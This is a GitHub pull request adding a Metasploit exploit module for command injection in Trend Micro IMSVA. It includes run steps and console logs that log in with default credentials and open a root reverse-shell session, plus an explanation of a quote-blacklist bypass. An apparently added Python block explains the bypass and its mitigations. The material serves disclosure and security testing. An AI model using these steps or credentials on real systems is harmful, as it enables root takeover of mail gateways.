
Add Module Trend Micro IMSVA Remote Code Execution #7969

Merged
merged 2 commits into from Feb 21, 2017

Conversation

@mmetince
Contributor

commented Feb 16, 2017

This module exploits a command injection vulnerability in the Trend Micro IMSVA product. An authenticated user can execute a terminal command under the context of the web server user, which is root. Besides, the default installation of IMSVA comes with default administrator credentials.

All the details required for installation are located in the .md file.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/trend_micro_imsva_exec
  • set RHOST 12.0.0.140
  • set LHOST 12.0.0.1
  • exploit
  • Verify the Meterpreter session 1 opened at console.

Console output:

msf > use exploit/linux/http/trend_micro_imsva_exec 
msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
RHOST => 12.0.0.140
msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1 
LHOST => 12.0.0.1
msf exploit(trend_micro_imsva_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 12.0.0.140
[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.140:60822) at 2017-01-18 11:29:36 +0300

meterpreter > getuid
Server username: root
meterpreter >

Thanks

I would like to thank @wvu-r7, who helped me find the workaround for the payload on IRC. Double quotes were blacklisted at the application layer, so I needed to find a way to pass the payload to the following command without surrounding it with double quotes: python -c "PAYLOAD".

The trick is that we are using Single, Backslash, Single, Single in our payload. I know it's been a while since we discussed this case on IRC, but the vendor finally released a patch!
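One way to see why the double-quote blacklist described above is not a mitigation, as an added Python illustration that is not code from the IMSVA product or from the Metasploit module; the filter, the hostname field and the sample inputs are assumptions constructed here:

```python
"""Why rejecting the double-quote character does not stop shell command injection.

Models the filter the PR describes (input containing '"' is refused), shows with
shlex that a POSIX shell accepts the same `python -c` argument written with single
quotes only, then contrasts the real mitigations: an allowlist and argv passing.
"""
import re
import shlex
import subprocess
import sys

# Constructed samples: the same argument to python -c, quoted two ways. The
# second form embeds each literal single quote as '\'' (close the quoted region,
# escaped quote, reopen), the "Single, Backslash, Single, Single" from the PR.
DOUBLE_QUOTED = '''python -c "print('hi')"'''
SINGLE_QUOTED = r"""python -c 'print('\''hi'\'')'"""


def naive_filter_allows(value: str) -> bool:
    """The blocklist under discussion: refuse only a literal double quote."""
    return '"' not in value


def shell_tokens(command_line: str) -> list:
    """Tokenise as a POSIX shell would; shlex.split follows POSIX quoting rules."""
    return shlex.split(command_line)


# Mitigation 1: validate the field against what it is supposed to hold.
# Hypothetical field: a hostname, so only letters, digits, '-' and '.'.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")


def allowlist_accepts(value: str) -> bool:
    return HOSTNAME_RE.fullmatch(value) is not None


# Mitigation 2: never build a shell string; hand the value over as argv.
def argv_roundtrip(value: str) -> str:
    """Run a child (python itself) with value as argv[1]; return what it received."""
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value]
    return subprocess.run(child, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    print(shell_tokens(DOUBLE_QUOTED) == shell_tokens(SINGLE_QUOTED))  # filter bypassed, same command
    print(argv_roundtrip("a'\\''b;echo x"))  # reaches the child verbatim; no shell ever parses it
```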

mmetince added 2 commits Jan 18, 2017

@wchen-r7 wchen-r7 self-assigned this Feb 16, 2017

@wchen-r7

Contributor

commented Feb 16, 2017

Testing this today. Thanks!

@wvu-r7

Contributor

commented Feb 17, 2017

My pleasure, @mmetince. Thank you for another great contribution!

@wchen-r7

Contributor

commented Feb 21, 2017

@mmetince I installed Trend Micro IMSVA, but there is no port 8445. Could you let me know how to set it up?

@mmetince

Contributor Author

commented Feb 21, 2017

@wchen-r7, which virtualisation application do you use? If you're using VMware, please do NOT choose the easy install option.

Once you have downloaded the ISO and started the installation, you must get an installation screen which really looks like CentOS (it's actually a customized CentOS).

There are several things that may be important. The following steps were tested on VMware Fusion.

  • Choose NAT mode for the interface before starting the VM.
  • After you choose keyboard, timezone, etc., you must see a network configuration screen. Since you have set NAT mode for the interface, you need to set an IP address, netmask, gateway and DNS. Here is my configuration.

IP Address: 12.0.0.140 (I was sure it was empty and not reserved by DHCP)
Gateway: 12.0.0.2 (this is my default gateway IP for the NAT network)
Netmask: 255.255.255.0
DNS: 8.8.8.8

You may get a warning that says DNS is outside your network, but don't worry, keep moving.

Once the installation has completed, the system will reboot and then you must see the following screen.

image

@wchen-r7

Contributor

commented Feb 21, 2017

Thanks for the instructions, and sorry for the long delay. The exploit works perfectly for me:

msf exploit(trend_micro_imsva_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Attempting to login with admin:imsva
[+] Authenticated as admin:imsva
[*] Delivering payload...
[*] Sending stage (38622 bytes) to 192.168.146.199
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.199:59710) at 2017-02-21 17:28:05 -0600

meterpreter > 

I will land it now. Thanks!

@wchen-r7 wchen-r7 merged commit 58c1f6f into rapid7:master Feb 21, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
wchen-r7 added a commit that referenced this pull request Feb 21, 2017
@wchen-r7

Contributor

commented Feb 21, 2017

Release Notes

The Module Trend Micro IMSVA Remote Code Execution has been added to the framework. It exploits a command injection vulnerability in Trend Micro IMSVA's HTTP service, which can result in remote code execution under the context of root.

@tdoan-r7 tdoan-r7 added the rn-exploit label Mar 6, 2017
